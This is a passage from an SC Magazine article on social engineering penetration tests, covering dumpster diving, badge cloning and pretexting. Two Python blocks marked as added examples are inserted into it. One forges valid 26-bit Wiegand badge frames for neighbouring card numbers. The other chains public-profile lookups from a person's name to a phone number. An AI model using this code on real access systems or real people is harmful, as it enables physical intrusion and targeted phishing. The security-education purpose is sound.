Bang for buck
Australian penetration testing firms have seen a rise in demand for their customised and targeted social engineering tests, but the volume is still low compared to technical penetration tests. Drazic says his company runs its multi-faceted ‘Red Cell’ social engineering tests and training about once a month for typically large companies with Australian offices. Other penetration testers report similar figures, with social engineering accounting for less than half of all tests.
Once the tests are completed, clients are trained to defend against real-world attacks. “In our experience, if done right, businesses do improve. We stay close with them and in all cases clients we have worked with have been very keen to expand upon the work.” Drazic says testers should mimic how “smart criminals” operate, and have intimate knowledge of previous data breaches that resulted from social engineering attacks. “Any monkey can make a phone call and try to get a password.”
But Ellsmore warns there are sometimes better ways to spend security budgets to get bang for buck, namely in understanding the information perimeter of the business, testing the security of applications, and testing and training staff. He notes that few organisations could prevent staff from stealing data and that the threat of a physical social engineering intrusion is low. “Is someone walking through the office a likely compromise? No, and there should be video footage of an intruder. There are many more lower-risk avenues of attack to look into.”
Tools of the trade
The social engineer isn’t a whimsical liar, but a methodical analyst. Both penetration testers and malicious attackers research a target organisation using public information including staff Facebook profiles, scans of IT infrastructure and documents left in rubbish bins.
HackLabs director Chris Gatford recently proved how lucrative humble dumpster diving could be when, on a job, he gave the receptionist of a Sydney business a friendly wave as he wheeled a bin full of sensitive documents out of the executive’s office and into an adjacent hotel. In the hotel room, Gatford sifted through the bin of documents marked for shredding and pulled out usernames and passwords, staff salaries and a spreadsheet listing critical systems. “They were owned,” he says.
Gatford wasn’t simply handed the bin. On his journey to the executive’s office, Gatford swiped an unattended staff badge and used a publicly-known duplication method to clone the card and assign it sufficient privileges to enter restricted areas.
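Why a swiped badge can be cloned and even upgraded: the following is an added illustration, not code from the article or from HackLabs. It assumes the badge carried a plain 26-bit Wiegand (H10301-style) credential, the common format on low-frequency proximity cards; the article does not name the card type or the duplication method used. The frame is nothing but a facility code, a card number and two parity bits, so anyone who reads one badge can mint valid frames for any other card number in the same facility.

```python
# Added example, not from the article or HackLabs. Assumes a 26-bit Wiegand
# (H10301-style) credential; the article does not state the card format.

def even_parity(bits: str) -> int:
    """Even-parity bit for a bit string: 1 when the count of set bits is odd."""
    return bits.count("1") % 2


def encode_h10301(facility_code: int, card_number: int) -> str:
    """Build the 26-bit frame: even parity bit, 8-bit facility code,
    16-bit card number, odd parity bit. Nothing here is secret or signed."""
    if not 0 <= facility_code < 256 or not 0 <= card_number < 65536:
        raise ValueError("facility code is 8 bits, card number is 16 bits")
    body = f"{facility_code:08b}{card_number:016b}"
    lead = even_parity(body[:12])        # even parity over the first 12 data bits
    trail = 1 - even_parity(body[12:])   # odd parity over the last 12 data bits
    return f"{lead}{body}{trail}"


def decode_h10301(bits: str) -> dict:
    """Split a captured 26-bit frame into its fields, rejecting bad parity."""
    if len(bits) != 26 or set(bits) - {"0", "1"}:
        raise ValueError("expected 26 binary digits")
    lead, body, trail = int(bits[0]), bits[1:25], int(bits[25])
    if lead != even_parity(body[:12]):
        raise ValueError("leading (even) parity mismatch")
    if trail != 1 - even_parity(body[12:]):
        raise ValueError("trailing (odd) parity mismatch")
    return {"facility_code": int(body[:8], 2), "card_number": int(body[8:], 2)}


def is_valid_h10301(bits: str) -> bool:
    """True if the frame has the right length and both parity bits check out."""
    try:
        decode_h10301(bits)
        return True
    except ValueError:
        return False


def forge_neighbours(bits: str, span: int = 2) -> list:
    """From one captured credential, produce valid frames for nearby card numbers
    in the same facility. Because the frame carries no secret, a reader that
    trusts the number alone will accept any of these that happens to be enrolled,
    including one belonging to a more privileged holder."""
    cred = decode_h10301(bits)
    centre = cred["card_number"]
    lo, hi = max(0, centre - span), min(65535, centre + span)
    return [encode_h10301(cred["facility_code"], n)
            for n in range(lo, hi + 1) if n != centre]


if __name__ == "__main__":
    captured = encode_h10301(42, 1337)   # constructed stand-in for a frame read off a swiped badge
    print(captured, decode_h10301(captured))
    for frame in forge_neighbours(captured):
        print(frame, decode_h10301(frame))
```

The check a practitioner wants here is on the reader side, not the card: a system that accepts any well-formed number in its facility range cannot tell a cloned or forged badge from the original. Mitigations such as card formats with authentication, and access control systems that flag a badge used in two places at once, are outside what this snippet shows.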
Link-analysis tools such as Maltego are used by attackers and penetration testers to map the relationships between pieces of information drawn from different sources. Such a tool could reveal, for example, that a target’s phone number or email address was published on motorcycle web sites. This data is used to build a pretext: the cover story and supporting background that social engineers use to con targets more effectively. The information is often used to craft targeted phishing emails or as a conversation topic to build rapport.
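To show what “determining data relationships” actually means in practice, here is an added example; it is not code from the article and not Maltego’s own. It mimics the transform-and-graph model such tools use: each transform turns one entity into related entities and records which source produced the link, and a breadth-first search then chains transforms from a seed (a person’s name) to a target kind of entity (a phone number). The staff directory and forum profiles are constructed stand-ins for the public sources the article lists; no real people, domains or numbers are involved.

```python
# Added example, not from the article and not Maltego's own code. All data
# sources below are constructed stand-ins for public sources.
from collections import deque

STAFF_DIRECTORY = [  # e.g. a company's "our team" page (constructed)
    {"name": "Jane Doe", "email": "jane.doe@example-corp.test", "title": "Finance Manager"},
]
FORUM_PROFILES = [  # e.g. profile pages on a hobbyist site (constructed)
    {"site": "motorcycle-forum.test", "username": "jane.doe",
     "email": "jane.doe@personal-mail.test", "phone": "+61 400 000 001"},
    {"site": "motorcycle-forum.test", "username": "rideordie",
     "email": "bob@personal-mail.test", "phone": "+61 400 000 002"},
]

# Entities are (kind, value) tuples. A transform maps one entity to a list of
# (entity, source) pairs, so every discovered link stays attributable.
def person_to_work_email(entity):
    kind, value = entity
    if kind != "person":
        return []
    return [(("email", r["email"]), "staff directory")
            for r in STAFF_DIRECTORY if r["name"] == value]

def email_to_username(entity):
    kind, value = entity
    if kind != "email":
        return []
    # People frequently reuse the local part of one address as a handle elsewhere.
    return [(("username", value.split("@", 1)[0]), "local part of " + value)]

def username_to_profile(entity):
    kind, value = entity
    if kind != "username":
        return []
    hits = []
    for p in FORUM_PROFILES:
        if p["username"] == value:
            hits.append((("email", p["email"]), p["site"]))
            hits.append((("phone", p["phone"]), p["site"]))
    return hits

TRANSFORMS = [person_to_work_email, email_to_username, username_to_profile]

def expand(entity):
    """Run every transform against one entity and pool the results."""
    found = []
    for transform in TRANSFORMS:
        found.extend(transform(entity))
    return found

def find_path(start, target_kind, max_depth=6):
    """Breadth-first search from a seed entity to the first entity of target_kind.
    Returns the chain of (entity, source) hops, or None if nothing connects
    within max_depth hops."""
    queue = deque([(start, [(start, "seed")])])
    seen = {start}
    while queue:
        entity, path = queue.popleft()
        if entity[0] == target_kind:
            return path
        if len(path) > max_depth:
            continue
        for nxt, source in expand(entity):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(nxt, source)]))
    return None

def describe(path):
    """Render a path as one line per hop, for a report or a pretext worksheet."""
    return "\n".join(f"{kind}: {value}  <- {source}" for (kind, value), source in path)

if __name__ == "__main__":
    route = find_path(("person", "Jane Doe"), "phone")
    print(describe(route) if route else "no link found")
```

The point for defenders is the second hop: the only thing connecting the corporate address to the hobbyist profile is a reused handle, which is exactly the kind of weak link that staff awareness training and a review of what is published about the business can address.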
The aim of the pretext is to make a target feel comfortable and familiar and to ease the elicitation of information. It is a tactic used by many professionals including sales staff, doctors, lawyers and clairvoyants, and allows social engineers to use a fictitious persona – like Wayne the auditor – that best fits the scenario.
This article first appeared in SC Magazine's March print edition.